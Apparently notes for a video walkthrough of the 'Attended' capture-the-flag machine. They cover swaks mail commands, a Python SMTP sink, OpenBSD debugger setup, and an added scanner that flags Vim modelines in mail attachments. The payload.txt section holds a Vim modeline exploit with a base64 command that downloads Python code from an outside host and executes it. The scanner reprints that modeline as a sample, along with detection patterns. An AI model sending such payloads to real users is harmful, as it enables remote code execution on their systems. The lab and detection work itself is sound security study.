Attended

Notes for https://youtu.be/uAvvrBO7zlk

User

Send mails via swaks

1) swaks --from 'root@attended.htb' --to 'guly@attended.htb' --header "Subject: Please subscribe" --body 'and click the like button' --server attended.htb
2) swaks --from 'freshness@attended.htb' --to 'guly@attended.htb' --header "Subject: Please subscribe" --body 'and click the like button' --server attended.htb
3) swaks --from 'freshness@attended.htb' --to 'guly@attended.htb' --header "Subject: Please subscribe" --body 'and click the like button' --server attended.htb --attach payload.txt

Mail Server

# Minimal SMTP sink: prints every message it receives.
# Needs Python 3.6-3.11 (smtpd and asyncore were removed in Python 3.12).
import asyncore
from smtpd import SMTPServer

class EmlServer(SMTPServer):
    def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None, rcpt_options=None):
        # data arrives as bytes (SMTPServer defaults to decode_data=False)
        print(f"From: {mailfrom}")
        print(f"To: {rcpttos}")
        print("Data:")
        for line in data.split(b"\n"):
            print(line)

def run():
    # Binding to port 25 requires root privileges
    EmlServer(('0.0.0.0', 25), None)
    try:
        asyncore.loop()
    except KeyboardInterrupt:
        pass

if __name__ == '__main__':
    run()

Payload.txt

This pulls a Python file called "x" from our web server and executes it:

:!echo aW1wb3J0IHJlcXVlc3RzIGFzIHI7ZXhlYyhyLmdldCgnaHR0cDovLzEwLjEwLjE0Ljc4L3gnKS50ZXh0KQ==| openssl base64 -d -A | python2.7 -
||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=1:fdt="
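
Detection side of the modeline payload above, as an added example (not from the original notes or the video): a scanner that flags mail attachments whose Vim modelines set expression options. The function names, regexes, option list and the sample message are assumptions constructed for illustration.

```python
import re
from email import message_from_bytes
from email.message import EmailMessage

MODELINES = 5  # Vim's default 'modelines': lines checked at top and bottom of a file
# Modeline introducer ("vi:", "vim:", "ex:") at line start or after whitespace.
INTRO = re.compile(r"(?:^|\s)(?:vi|vim|Vim|ex):\s*(?:set? )?(.*)$")
# Options whose value Vim evaluates as an expression (long and short names).
EXPR_OPTS = re.compile(
    r"\b(foldexpr|fde|foldtext|fdt|formatexpr|fex|indentexpr|inde|includeexpr|inex)\s*=")
# assert_fails and source! come from the modeline in these notes; the rest are assumed extras.
RISKY = re.compile(r"assert_fails\s*\(|source\\?!|\bexecute\b|\bsystem\s*\(")

def scan_text(text):
    """Return [(line_no, reason)] for suspicious modelines in one file body."""
    lines = text.splitlines()
    n = len(lines)
    window = set(range(min(MODELINES, n))) | set(range(max(0, n - MODELINES), n))
    hits = []
    for i in sorted(window):
        m = INTRO.search(lines[i])
        opts = m.group(1) if m else ""
        if RISKY.search(opts):
            hits.append((i + 1, "modeline expression runs a command"))
        elif EXPR_OPTS.search(opts):
            hits.append((i + 1, "modeline sets an expression option"))
    return hits

def scan_message(raw):
    """Scan every named attachment of a message given as bytes."""
    findings = {}
    for part in message_from_bytes(raw).walk():
        name = part.get_filename()
        if name is None or part.is_multipart():
            continue
        hits = scan_text(part.get_payload(decode=True).decode("utf-8", "replace"))
        if hits:
            findings[name] = hits
    return findings

def sample_message():
    """Constructed sample: one attachment with the modeline from these notes."""
    msg = EmailMessage()
    msg["From"], msg["To"] = "sender@example.test", "rcpt@example.test"
    msg.set_content("see attachment")
    bad = 'placeholder\n||" vi:fen:fdm=expr:fde=assert_fails("source\\!\\ \\%"):fdl=1:fdt="\n'
    msg.add_attachment(bad.encode(), maintype="text", subtype="plain", filename="payload.txt")
    msg.add_attachment(b"# vim: set ts=4 sw=4:\n", maintype="text", subtype="plain", filename="ok.txt")
    return msg.as_bytes()
```

Setting `nomodeline` in the reader's vimrc removes this parsing path entirely; the scanner is a complement at the mail gateway.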

HTTP Reverse Shell

Root

Prepare OpenBSD VM

export PKG_PATH=https://mirror.fsrv.services/pub/OpenBSD/6.8/packages/amd64/
pkg_add -v gdb
pkg_add wget
pkg_add nano
pkg_add py3-pip
pkg_add git
wget -O ~/.gdbinit-gef.py -q https://github.com/hugsy/gef/raw/master/gef.py
echo source ~/.gdbinit-gef.py >> ~/.gdbinit
export LC_CTYPE=C.UTF-8
egdb

EAX-Finder

Final Exploit
